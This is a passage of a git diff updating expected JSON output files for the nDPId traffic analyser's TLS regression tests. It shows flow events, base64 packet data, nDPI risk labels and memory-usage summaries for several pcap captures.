{"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -29,9 +29,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5884098 bytes -~~ total memory freed........: 5884098 bytes -~~ total allocations/frees...: 118145/118145 +~~ total memory allocated....: 6017732 bytes +~~ total memory freed........: 6017732 bytes +~~ total allocations/frees...: 120907/120907 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 968 chars diff --git a/test/results/tls_esni_sni_both.pcap.out b/test/results/tls_esni_sni_both.pcap.out index f0178a8b2..3ea88d156 100644 --- a/test/results/tls_esni_sni_both.pcap.out +++ b/test/results/tls_esni_sni_both.pcap.out @@ -4,16 +4,16 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595697574192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697574192,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjMAbsVnUj1AAAAALAC\/\/+ITAAAAgQFtAEDAwYBAQgKRX5W8wAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595697574222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697574222,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72MxjNlEZFZ1I9oAS\/\/+oqwAAAgQFeAEBBAIBAwMK"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595697574222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697574222,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjMAbsVnUj2YzZRGlAQEADZRAAA"} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} -01204{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} +01204{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697597731,"flow_last_seen":1595697597731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697597731,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1595697597731,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697597731,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjaAbvycO9jAAAAALAC\/\/+plAAAAgQFtAEDAwYBAQgKRX6yWgAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1595697597760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697597760,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72Npkmiax8nDvZIAS\/\/9OXwAAAgQFeAEBBAIBAwMK"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1595697597760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697597760,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjaAbvycO9kZJomslAQEAB++AAA"} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} -01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} +01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-payload-len":13775,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1595697597855} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 @@ -23,9 +23,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876941 bytes -~~ total memory freed........: 5876941 bytes -~~ total allocations/frees...: 118166/118166 +~~ total memory allocated....: 6010575 bytes +~~ total memory freed........: 6010575 bytes +~~ total allocations/frees...: 120928/120928 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 1215 chars diff --git a/test/results/tls_false_positives.pcapng.out b/test/results/tls_false_positives.pcapng.out new file mode 100644 index 000000000..645ec247d --- /dev/null +++ b/test/results/tls_false_positives.pcapng.out @@ -0,0 +1,24 @@ +00472{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_false_positives.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_false_positives.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1641232761063} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1641232761063,"flow_last_seen":1641232761063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1641232761063,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1445,"dst_port":20979,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1641232761063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1641232761063,"pkt":"AAAAAAAAAAcAi3YBCABFAAA0AABAADcGbxAKCgoBwKgAAQWlUfMZL\/oS1g972YASchBrdgAAAgQFtAEBBAIBAwMK"} +00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1641232761612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1641232761612,"pkt":"AAAAAAAAAAcAi3YBCABFAACs+xRAAD4GbIPAqAABCgoKAVHzBaXWD3vZGS\/6E1AYBVnujAAAhAAAAAKIJwDIAAUJDggAAAAEAFNDuAsEAAEAAAAEAFND8wMEAGAAAAAFAGFidmVyBAAxMDA3CwBjb3VudHJ5Y29kZQIAT00DAGlzcAcAT29yZWRvbwIAb3MHAGFuZHJvaWQHAHNka3R5cGUEAG5lcnYLAHZlcnNpb25jb2RlBAA0ODIz"} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1641232761626,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1641232761626,"pkt":"AAAAAAAAAAcAi3YBCABFAAA1cw1AADcG\/AEKCgoBwKgAAQWlUfMZL\/oT1g98XVAYAB4RGgAADQAAAAKJJwDIAA4BAA=="} +00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":30,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1641232761063,"flow_last_seen":1641232767465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":35681,"flow_avg_l4_payload_len":1189,"midstream":0,"thread_ts_msec":1641232767465,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1445,"dst_port":20979,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1641232761063,"flow_last_seen":1641232767465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":35681,"flow_avg_l4_payload_len":1189,"midstream":0,"thread_ts_msec":1641232767465,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1445,"dst_port":20979,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"tls_false_positives.pcapng","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":35681,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1641232767465} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 30/30 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 35681 bytes +~~ total detected protocols..: 0 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6005995 bytes +~~ total memory freed........: 6005995 bytes +~~ total allocations/frees...: 120907/120907 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 477 chars +~~ json string max len.......: 647 chars +~~ json string avg len.......: 559 chars diff --git a/test/results/tls_invalid_reads.pcap.out b/test/results/tls_invalid_reads.pcap.out index fe1373ca8..7cae5414a 100644 --- a/test/results/tls_invalid_reads.pcap.out +++ b/test/results/tls_invalid_reads.pcap.out @@ -4,34 +4,35 @@ 